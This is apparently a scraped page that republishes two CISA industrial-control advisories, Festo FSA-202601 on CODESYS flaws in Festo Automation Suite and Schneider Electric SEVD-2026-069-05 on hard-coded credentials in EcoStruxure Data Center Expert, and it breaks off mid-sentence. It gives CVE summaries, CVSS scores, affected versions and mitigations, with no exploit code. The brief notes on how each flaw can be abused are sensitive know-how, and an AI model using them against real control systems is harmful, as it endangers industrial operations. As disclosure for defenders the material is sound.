FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H CVE-2023-6357 A low-privileged remote attacker could exploit the vulnerability and inject additional system commands via file system libraries which could give the attacker full control of the device. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2024-5000 An unauthenticated remote attacker can use a malicious OPC UA client to send a crafted request to affected CODESYS products which can cause a DoS due to incorrect calculation of buffer size. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-13 ASP.NET Misconfiguration: Password in Configuration File Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2024-8175 An unauthenticated remote attacker can causes the CODESYS web server to access invalid memory which results in a DoS. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-0694 Insufficient path validation in CODESYS Control allows low privileged attackers with physical access to gain full filesystem access. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.6 MEDIUM CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-1468 An unauthenticated remote attacker can gain access to sensitive information including authentication information when using CODESYS OPC UA Server with the non-default Basic128Rsa15 security policy. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-203 Observable Discrepancy Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2025-41658 CODESYS Runtime Toolkit-based products may expose sensitive files to local low-privileged operating system users due to default file permissions. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-276 Incorrect Default Permissions Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2025-41659 A low-privileged attacker can remotely access the PKI folder of the CODESYS Control runtime system and thus read and write certificates and its keys. This allows sensitive data to be extracted or to accept certificates as trusted. Although all services remain available, only unencrypted communication is possible if the certificates are deleted. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L CVE-2020-11023 In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N CVE-2022-47382 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Acknowledgments CERT@VDE reported this vulnerability to Festo Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-03-17 Date Revision Summary 2026-03-17 1 Initial Republication of Festo SE & Co. KG FSA-202601 Legal Notice and Terms of Use

View CSAF Summary Schneider Electric is aware of a hard-coded credentials vulnerability in its EcoStruxure IT Data Center Expert (DCE) product that requires administrator credentials and enabling a feature (SOCKS Proxy) that is off by default. The EcoStruxure IT Data Center Expert product is a scalable monitoring software that collects, organizes, and distributes critical device information providing a comprehensive view of equipment. Failure to apply the remediation provided below may risk information disclosure, and remote compromise of the offer which could result in disruption of operations and access to system data. The following versions of Schneider Electric EcoStruxure Data Center Expert are affected: EcoStruxure IT Data Center Expert vers:intdot/<=9.0 EcoStruxure IT Data Center Expert 9.1 CVSS Vendor Equipment Vulnerabilities v3 7.2 Schneider Electric Schneider Electric EcoStruxure Data Center Expert Use of Hard-coded Credentials Background Critical Infrastructure Sectors: Commercial Facilities, Energy, Food and Agriculture, Government Services and Facilities, Transportation Systems Countries/Areas Deployed: Worldwide Company Headquarters Location: France Vulnerabilities Expand All + CVE-2025-13957 A hard-coded credentials vulnerability exists that could lead to information disclosure and remote code execution when SOCKS Proxy is enabled, and administrator credentials and PostgreSQL database credentials are known. SOCKS Proxy is disabled by default. View CVE Details Affected Products Schneider Electric EcoStruxure Data Center Expert Vendor: Schneider Electric Product Version: EcoStruxure IT Data Center Expert (Formerly known as StruxureWare Data Center Expert) v9.0 and prior Product Status: fixed, known_affected Remediations Vendor fix v9.1 of EcoStruxure IT Data Center Expert includes a fix for this vulnerability and is available for download here: https://www.se.com/en/product-range/61851-ecostruxure-it-data-center-expert/#software-and-firmware Mitigation If users choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: • Harden the DCE instance according to the cybersecurity best practices documented in the EcoStruxure IT Data Center Expert Security Handbook • Ensure the SOCKS Proxy is disabled as in the default configuration. Mitigation For more information see the associated Schneider Electric CPCERT security advisory SEVD-2026-069-05 Use of Hard-coded Credentials vulnerability in EcoStruxure IT Data Center Expert PDF Version https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-05&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-069-05.pdf Mitigation For more information see the associated Schneider Electric CPCERT security advisory SEVD-2026-069-05 Use of Hard-coded Credentials vulnerability in EcoStruxure IT Data Center Expert CSAF Version https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-05&p_enDocType=Security+and+Safety+Notice&p_File_Name=sevd-2026-069-05.json Relevant CWE: CWE-798 Use of Hard-coded Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Acknowledgments hassan ali of TrendAI Zero Day Initiative reported this vulnerability to Schneider Electric General Security Recommendations Schneider Electric strongly recommends the following industry cybersecurity best practices: * Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. * Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. * Place all controllers in locked cabinets and never leave them in the “Program” mode. * Never connect programming software to any network other than the network intended for that device. * Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. * Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. * Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric [Recommended Cybersecurity Best Practices](https://www.se.com/us/en/download/document/7EN52-0390/) document. For More Information This document provides an overview of the identified vulnerability or vulnerabilities and actions required to mitigate. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process. For further information related to cybersecurity in Schneider Electric’s products, visit the company’s cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp LEGAL DISCLAIMER THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS “NOTIFICATION”) ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN “AS-IS” BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION About Schneider Electric Schneider's purpose is to create Impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in Sustainability and Efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes. Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI enabled Industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Schneider Electric CPCERT SEVD-2026-069-05 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider 